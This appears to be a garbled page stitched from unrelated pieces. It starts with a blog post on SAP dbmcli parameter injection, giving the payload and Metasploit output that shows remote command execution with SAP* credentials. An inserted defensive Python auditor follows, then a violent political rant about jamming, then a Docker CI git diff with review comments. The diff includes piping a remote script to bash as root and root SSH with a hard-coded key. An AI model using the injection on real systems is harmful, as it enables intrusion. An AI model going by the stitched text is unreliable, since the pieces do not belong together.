Sunday, May 13, 2018

SAP Parameter Injection

The technique employed involves causing the executable to write attacker-controlled input to an attacker-controlled file. The same executable is then invoked to read commands to execute from that file. For example, passing the following command line to the dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.
-o /tmp/pwned.txt -n pwnie\n!id\tfoo\n
The contents of the file are presented below.
Error! Connection failed to node pwnie
!id
 for database (no dbname):
unknown host pwnie
!id
 (see /etc/hosts
If the file is passed back to the binary as illustrated in the command line below, then every line prefixed with an exclamation mark is executed as an OS command (in this case twice, since the injected node name is echoed in two error lines).
-ic /tmp/pwned.txt
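As an added example (not code from the original post), the two halves of the technique above written from the defender's side in Python: extract_shell_lines models what dbmcli does with a file handed to -ic, treating every line that starts with '!' as an OS command, and runs over the output-file contents shown above as constructed sample input; audit_parameters is a hypothetical pre-check for the additional-parameter string of a configured external command that wraps dbmcli, rejecting the ingredients this injection relies on (embedded newlines and tabs, the -o and -ic options named on the page, and '!' tokens). The option list and the token character set are assumptions and should be extended from the dbmcli documentation and the specific SM69 command definition.

```python
import re

# Constructed sample: the contents dbmcli wrote to the -o output file in the
# post above (the node name carried an embedded newline and a "!id" line).
SAMPLE_OUTPUT_FILE = (
    "Error! Connection failed to node pwnie\n"
    "!id\n"
    " for database (no dbname):\n"
    "unknown host pwnie\n"
    "!id\n"
    " (see /etc/hosts\n"
)

# Options named on the page that turn dbmcli into a file writer (-o) or a
# command-file reader (-ic). Assumed to be incomplete: extend from the docs.
DENIED_OPTIONS = ("-o", "-ic")
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# Assumed character set for a benign parameter token (no '/', '!', quotes).
TOKEN_CHARSET = re.compile(r"^[A-Za-z0-9_.,=:@-]+$")


def extract_shell_lines(command_file_text):
    """Return the OS commands dbmcli would run if this text were fed back
    to it with -ic: every line whose first character is '!', prefix stripped."""
    commands = []
    for line in command_file_text.splitlines():
        if line.startswith("!"):
            commands.append(line[1:].strip())
    return commands


def audit_parameters(additional_params):
    """Audit a proposed 'additional parameters' string for an SM69-style
    external command wrapping dbmcli. Returns a list of findings; an empty
    list means every check passed. Hypothetical helper, not SAP code."""
    findings = []
    # A newline or tab inside one argument is what lets the echoed node name
    # become a separate '!' line in the output file.
    if CONTROL_CHARS.search(additional_params):
        findings.append("control character (newline/tab) in parameters")
    for token in additional_params.split():
        if token.startswith("!"):
            findings.append(f"shell escape token: {token!r}")
        if any(token == opt or token.startswith(opt) for opt in DENIED_OPTIONS):
            findings.append(f"file-redirecting option: {token!r}")
        if not TOKEN_CHARSET.match(token):
            findings.append(f"unexpected characters in token: {token!r}")
    return findings


if __name__ == "__main__":
    print("commands dbmcli would execute:", extract_shell_lines(SAMPLE_OUTPUT_FILE))
    for finding in audit_parameters("-o /tmp/pwned.txt -n pwnie\n!id\tfoo\n"):
        print("REJECT:", finding)
    print("benign:", audit_parameters("-d MAXDB -n localhost db_state"))
```

The audit deliberately errs on the side of rejection: a conservative allowlist on the parameter string is the only layer that holds here, because the command is executed without a shell and metacharacter filtering alone does nothing against an executable's own file-writing and command-file options.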
The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXEC can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and relevant permissions are required.
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting metacharacters; on Linux, however, they cannot – until now, of course. By making use of the same exploit technique that Context IS used for the exploitation of the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.
I have crafted several Metasploit modules to demonstrate this vector and the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CLIENT   001              yes       Client
  CMD      id               yes       Command to run
  OS       Linux            yes       Windows/Linux
  PASS     06071992         yes       Password
  Proxies                   no        Use a proxy chain
  RHOSTS   172.16.252.150   yes       SAP ICM server address
  RPORT    8042             yes       SAP ICM server port number
  THREADS  1                yes       The number of concurrent threads
  USER     SAP*             yes       Username
  VHOST                     no        HTTP server virtual host

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!id
  uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a
CMD => uname -a
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!uname -a
  Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector.
msf  auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992

[SAP] Command Exec
==================

   Output
   ------
   
   >!id
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
These modules and many more will be released and submitted to the framework very soon. In the meantime you can download the modules to try from here:

Saturday, May 12, 2018

welcome back to war! "makes it possible...to make jammers sufficiently small that a DJN can take the form of a dust suspending in the air...Therefore, new miniature devices such as nanotube radio may find their first application in jamming dust..."...so you understand...their worry is distance, while they make the war operations, so this makes it possible to jam all nodes, or at least be able to find one node and jam the whole network...see if you understand "we...are radio jammers"
I don't accept living under Law written in 1789!!!! I do not accept living under a Constitution written in 1974!!!!! I do not accept that the only 3 Men thinking were Thomas Hobbes, John Smith and Jean Jacques Rousseau!!!! I do not accept a world ruled by people who were born in times like 1945, who did not have soap for bathing, or toothpaste!!!!!! I do not accept living under a Law made by half dead men, and half pensioners!!!! Constitutions must be revisited every generation, by referendum!!!! Politics must be community work!!!! I do not accept Adam Smith the Thinker, and I'm the fruit fly!!!!! Our Constitution will be based on the Law of our times, destiny for our generation and future generations!!! Our Constitution will defend Uploads, Upgrades, Downloads as part of Democracy development!!!! Our Constitution will abolish tests made and evaluated by Humans!!! We will abolish Kings and Queens, Lords and Pharaohs! Therefore, I'm here to Destroy and Kill! Make their armies so insecure they will hardly breathe loud!!!
scalable is
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..c124898
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,33 @@
+
+FROM ubuntu:14.04
+MAINTAINER Takashi Masuda
+
+RUN apt-get update && \
+    apt-get install -y curl openssh-server rsync && \
+    apt-get clean && \
+
+    # SSHD
+    mkdir /var/run/sshd && \
+    sed -i -e 's/PermitRootLogin without-password/PermitRootLogin yes/' \
+           -e 's/#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config && \
+
+    # Create /root/.ssh/authorized_keys
+    mkdir -p /root/.ssh && \
+    echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXDZmjpkxKwjFBec3v1S9vHpEAmgT7k5A8iLlhUtRGVvgADLgoblHgNitCg8qoDLDeRX0iY+smjChP1n0LBEaSZR+9G6J6/HPg3GHBaSDCpZK1sajTamGBPLokTDStdejJQPyh7ZZUxyN8RzOmH1Eu2FggCI+y/b60KxQnJorG5fxfhy4faFuzdUmEN+yaJu7U5pCQcsNhDqOKCpfiBm2Of1oPby4VybIXvF4TgkpJJ7JwmCIG62X5ldSh86lmKWQdJanelmz/GkJ+2CtSuKjIQuFajz1nBcNZzjPXSBYA+qDCT0mNQNvtgyDZjDZ4ALpkhzjeqHnd+esuulo1o8fJ ci-docker > /root/.ssh/authorized_keys  && \
+    chmod 600 /root/.ssh/authorized_keys && \
+
+    # SSH login fix. Otherwise user is kicked off after login
+    sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd && \
+
+    # Install Chef Client
+    CHEF_VERSION=12.4.1 && \
+    curl -L https://www.chef.io/chef/install.sh | bash -s -- -v $CHEF_VERSION && \
+
+    # Use in site-cookbooks
+    echo PermitUserEnvironment yes >> /etc/ssh/sshd_config && \
+    echo DOCKER_IN_CIRCLECI=true > /root/.ssh/environment
+
+EXPOSE 22
+CMD ["/usr/sbin/sshd", "-D"]
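Review bot: the sshd configuration in this RUN step grants more than the CI use needs: `PermitRootLogin yes` combined with a single hard-coded public key in `/root/.ssh/authorized_keys` means every build of the image trusts one long-lived key pair, and `PermitUserEnvironment yes` lets the holder of that key set arbitrary environment variables in every session, which sshd_config itself documents as a way to bypass access restrictions; it is a broad setting to enable only to pass `DOCKER_IN_CIRCLECI=true`. Consider supplying the flag with `docker run -e` or a node attribute instead, and inject the public key at build time rather than committing it to the Dockerfile. Separately, `curl -L https://www.chef.io/chef/install.sh | bash -s -- -v $CHEF_VERSION` runs an unpinned remote script as root with no checksum; pinning the client version does not pin the installer, so download the script to a file and verify it before executing.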
diff --git a/circle.yml b/circle.yml
index 8b1eb47..957be6a 100644
--- a/circle.yml
+++ b/circle.yml
@@ -1,7 +1,10 @@
+machine:
+  services:
+    - docker
+
 dependencies:
   cache_directories:
-    - ~/.vagrant.d
-    - ~/tmp
+    - ~/cache
   pre:
     - |
       gem update bundler --no-document
@@ -10,19 +13,7 @@ dependencies:
         exit 0
       fi
  
-      VERSION=1.7.4
-
-      mkdir -p ~/tmp
-      cd ~/tmp
-
-      if [ ! -f vagrant_${VERSION}_x86_64.deb ]; then
-        wget https://dl.bintray.com/mitchellh/vagrant/vagrant_${VERSION}_x86_64.deb
-      fi
-      sudo dpkg -i vagrant_${VERSION}_x86_64.deb
-
-      if ! vagrant plugin list | fgrep -q vagrant-aws; then
-        vagrant plugin install vagrant-aws
-      fi
+      ./script/bootstrap-docker.sh
  
 test:
   pre:
@@ -30,21 +21,18 @@ test:
       if [ -n "${BUNDLE_UPDATE}" ]; then
         exit 0
       fi
-      vagrant up ec2
-      vagrant ssh-config --host=ec2 ec2 >> ~/.ssh/config
-      bundle exec knife solo bootstrap ec2
+
+      bundle exec knife solo cook ci-docker
+
+      # workaround
+      ssh ci-docker "/etc/init.d/mongodb start && /etc/init.d/td-agent start"
   override:
     - |
       if [ -n "${BUNDLE_UPDATE}" ]; then
         exit 0
       fi
-      bundle exec rake spec:ec2
-  post:
-    - |
-      if [ -n "${BUNDLE_UPDATE}" ]; then
-        exit 0
-      fi
-      vagrant destroy -f ec2
+
+      bundle exec rake spec:ci:docker
  
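Review bot: the `# workaround` comment before `ssh ci-docker "/etc/init.d/mongodb start && /etc/init.d/td-agent start"` should state what is being worked around (presumably that the container has no init system, so the service resources in the cookbooks cannot start these daemons) and why the `knife solo cook` step cannot do it itself; a bare "workaround" will not tell the next person when it can be removed. Also, the deleted `post` step (`vagrant destroy -f ec2`) has no Docker counterpart, so the container started by `bootstrap-docker.sh` is never stopped; acceptable on a throwaway CI machine, but worth a comment.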
 deployment:
   production:
diff --git a/nodes/ec2.json b/nodes/ci-docker.json
similarity index 100%
rename from nodes/ec2.json
rename to nodes/ci-docker.json
diff --git a/script/bootstrap-docker.sh b/script/bootstrap-docker.sh
new file mode 100755
index 0000000..b250160
--- /dev/null
+++ b/script/bootstrap-docker.sh
@@ -0,0 +1,36 @@
+#!/bin/sh -xe
+
+cat <> $HOME/.ssh/config
+Host ci-docker
+  HostName 127.0.0.1
+  User root
+  Port 40022
+  UserKnownHostsFile /dev/null
+  StrictHostKeyChecking no
+  PasswordAuthentication no
+  IdentityFile ~/.ssh/id_ci-docker
+  IdentitiesOnly yes
+  LogLevel FATAL
+EOF
+
+chmod 600 $HOME/.ssh/config
+
+docker_archive=$HOME/cache/ubuntu.tar.gz
+md5_digest_file=$HOME/cache/Dockerfile.digest
+
+cache_is_available() {
+   md5sum --status --quiet --check $md5_digest_file > /dev/null 2>&1
+}
+
+if cache_is_available; then
+   docker load < $docker_archive
+else
+   mkdir -p $HOME/cache
+   docker build -t docker/ubuntu .
+   md5sum $HOME/$CIRCLE_PROJECT_REPONAME/Dockerfile > $md5_digest_file
+   docker save docker/ubuntu | gzip -c > $docker_archive
+fi
+
+docker info
+
+docker run -d --privileged -p 40022:22 docker/ubuntu
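Review bot: `cat <> $HOME/.ssh/config` is not a heredoc: `<>` opens the file read/write, `cat` prints it, and the lines down to `EOF` are then executed as commands, so under `sh -xe` the script aborts at `Host ci-docker`. If this is a rendering artifact of `cat <<EOF >> $HOME/.ssh/config`, confirm the committed file; otherwise fix it. Next, `docker run -d --privileged -p 40022:22 docker/ubuntu` gives the sshd container full device and capability access to the CI host, and nothing in the cookbooks shown needs that; drop `--privileged` unless a specific recipe requires it and say which. `StrictHostKeyChecking no` with `UserKnownHostsFile /dev/null` is tolerable only because `HostName` is `127.0.0.1`; keep it scoped to this `Host` stanza. Finally, the cache check hashes only the Dockerfile, so cookbook changes never invalidate the cached image; that is fine because `knife solo cook` applies them afterwards, but a comment would make the intent clear.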
diff --git a/site-cookbooks/hostname/recipes/default.rb b/site-cookbooks/hostname/recipes/default.rb
index 3525de7..9c25938 100644
--- a/site-cookbooks/hostname/recipes/default.rb
+++ b/site-cookbooks/hostname/recipes/default.rb
@@ -15,4 +15,5 @@ end
  
 file '/etc/hostname' do
   content "#{fqdn}\n"
+  atomic_update false
 end
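Review bot: `atomic_update false` needs a one-line comment explaining why: Chef's default atomic update renames a temporary file over `/etc/hostname`, which fails inside a Docker container where that path is a bind mount, so the non-atomic write is only required for the CI container. Without the comment this reads as an accidental weakening of the resource on production hosts as well; consider guarding it with the same `ENV['DOCKER_IN_CIRCLECI']` check used in the other recipes.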
diff --git a/site-cookbooks/jdk/recipes/default.rb b/site-cookbooks/jdk/recipes/default.rb
index 8a04f0a..f04839c 100644
--- a/site-cookbooks/jdk/recipes/default.rb
+++ b/site-cookbooks/jdk/recipes/default.rb
@@ -7,4 +7,7 @@
 # All rights reserved - Do Not Redistribute
 #
  
-package 'openjdk-7-jdk'
+package 'openjdk-7-jdk' do
+  options '--no-install-recommends' if ENV['DOCKER_IN_CIRCLECI']
+end
diff --git a/site-cookbooks/ufw/recipes/default.rb b/site-cookbooks/ufw/recipes/default.rb
index 6a0f2e7..289dcc6 100644
--- a/site-cookbooks/ufw/recipes/default.rb
+++ b/site-cookbooks/ufw/recipes/default.rb
@@ -7,6 +7,8 @@
 # All rights reserved - Do Not Redistribute
 #
  
+return if ENV['DOCKER_IN_CIRCLECI']
+
 execute 'ufw reload' do
   action :nothing
 end
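Review bot: `return if ENV['DOCKER_IN_CIRCLECI']` silently turns the firewall recipe into a no-op based on an environment variable that reaches the Chef run only through sshd's `PermitUserEnvironment`; if that variable is ever set on a real host, or leaks in through a user's ssh environment, no firewall rules are applied and nothing is logged. Emit a `Chef::Log.warn` before returning, and prefer a node attribute (for example in `nodes/ci-docker.json`) over an environment variable for this kind of branching.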
diff --git a/spec/role/ci_spec.rb b/spec/role/ci_spec.rb
index 5a091d7..d8798a8 100644
--- a/spec/role/ci_spec.rb
+++ b/spec/role/ci_spec.rb
@@ -27,7 +27,6 @@ describe 'prod' do
   it_behaves_like 'sysstat'
   it_behaves_like 'td-agent'
   it_behaves_like 'timezone'
-  it_behaves_like 'ufw'
   it_behaves_like 'user'
   it_behaves_like 'zsh'
 end
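Review bot: dropping `it_behaves_like 'ufw'` from this role spec means the firewall is no longer verified anywhere in CI, since the `ufw` recipe is also skipped inside the container; if the same shared example is still exercised against the `prod` host outside CI, note that in the spec, otherwise keep a minimal expectation that records the recipe was deliberately skipped rather than removing the coverage silently.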
diff --git a/tasks/spec.rake b/tasks/spec.rake
index 120ff7f..f4265f6 100644
--- a/tasks/spec.rake
+++ b/tasks/spec.rake
@@ -7,8 +7,8 @@ hosts = [
     role: 'prod',
   },
   {
-    name: 'ec2',
-    short_name: 'ec2',
+    name: 'ci-docker',
+    short_name: 'ci:docker',
     role: 'ci',
   },
   {